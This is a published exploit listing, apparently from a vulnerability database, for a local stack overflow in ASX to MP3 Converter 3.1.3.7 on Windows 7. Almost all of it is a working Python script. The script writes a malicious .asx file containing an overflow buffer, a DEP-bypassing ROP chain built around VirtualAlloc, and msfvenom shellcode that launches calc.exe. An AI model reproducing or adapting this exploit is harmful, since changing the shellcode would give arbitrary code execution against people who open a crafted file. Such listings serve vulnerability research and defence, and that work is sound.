ASX To MP3 Converter 3.1.3.7 Local Stack Overflow

2019.10.07
Credit: max7253
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP) # Google Dork: N/A # Date: 2019-10-06 # Exploit Author: max7253 # Vendor Homepage: http://www.mini-stream.net/ # Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe # Version: 3.1.3.7.2010.11.05 # Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC # CVE : N/A # Note: There is a similar exploit published but it doesn't work in the OS I used: # https://www.exploit-db.com/exploits/42963 # This exploit in the ROP chain uses addresses from ASLR modules. Not sure what OS that exploit was tested on. import struct file = 'fuzz_rop.asx' #Tested on #OS Name: Microsoft Windows 7 Enterprise #OS Version: 6.1.7601 Service Pack 1 Build 7601 #System Type: x64-based PC #msfvenom -p windows/exec cmd=calc.exe -a x86 -b '\x00\x09\x0a' -f python buf = b"" buf += b"\xda\xd7\xbf\xf1\xca\xd1\x3f\xd9\x74\x24\xf4\x5a\x29" buf += b"\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x14\x03\x7a\xe5\x28" buf += b"\x24\xc3\xed\x2f\xc7\x3c\xed\x4f\x41\xd9\xdc\x4f\x35" buf += b"\xa9\x4e\x60\x3d\xff\x62\x0b\x13\x14\xf1\x79\xbc\x1b" buf += b"\xb2\x34\x9a\x12\x43\x64\xde\x35\xc7\x77\x33\x96\xf6" buf += b"\xb7\x46\xd7\x3f\xa5\xab\x85\xe8\xa1\x1e\x3a\x9d\xfc" buf += b"\xa2\xb1\xed\x11\xa3\x26\xa5\x10\x82\xf8\xbe\x4a\x04" buf += b"\xfa\x13\xe7\x0d\xe4\x70\xc2\xc4\x9f\x42\xb8\xd6\x49" buf += b"\x9b\x41\x74\xb4\x14\xb0\x84\xf0\x92\x2b\xf3\x08\xe1" buf += b"\xd6\x04\xcf\x98\x0c\x80\xd4\x3a\xc6\x32\x31\xbb\x0b" buf += b"\xa4\xb2\xb7\xe0\xa2\x9d\xdb\xf7\x67\x96\xe7\x7c\x86" buf += b"\x79\x6e\xc6\xad\x5d\x2b\x9c\xcc\xc4\x91\x73\xf0\x17" buf += b"\x7a\x2b\x54\x53\x96\x38\xe5\x3e\xfc\xbf\x7b\x45\xb2" buf += b"\xc0\x83\x46\xe2\xa8\xb2\xcd\x6d\xae\x4a\x04\xca\x40" buf += b"\x01\x05\x7a\xc9\xcc\xdf\x3f\x94\xee\x35\x03\xa1\x6c" buf += b"\xbc\xfb\x56\x6c\xb5\xfe\x13\x2a\x25\x72\x0b\xdf\x49" buf += b"\x21\x2c\xca\x29\xa4\xbe\x96\x83\x43\x47\x3c\xdc" payload = "http://" payload += "A" * 17417 + struct.pack('<L', 0x1002D038) + "CCCC" ## Save allocation type (0x1000) in EDX payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x11111111) payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN payload += struct.pack('<L', 0xEEEEFEEF) payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x41414141) ## Save the address of VirtualAlloc() in ESI payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN [MSA2Mfilter03.dll] payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll] payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll] payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN payload += struct.pack('<L', 0x41414141) payload += struct.pack('<L', 0x41414141) ## Save the size of the block in EBX payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN ## Save the address of (# ADD ESP,8 # RETN) in EBP payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN #payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN ## Save memory protection code (0x40) in ECX payload += struct.pack('<L', 0x1002ca22) # POP ECX # RETN payload += struct.pack('<L', 0xFFFFFFFF) payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN ## Save ROP-NOP in EDI payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN payload += struct.pack('<L', 0x1002D038) # RETN ## Save NOPs in EAX #payload += struct.pack('<L', 0x1003bca4) # POP EAX # RETN [MSA2Mfilter03.dll] #payload += struct.pack('<L', 0x90909090) # nop ## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN payload += struct.pack('<L', 0xA4E2F275) payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN payload += "\x90" * 4 payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN payload += "\x90" * 20 payload += buf f = open(file,'w') f.write(payload) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top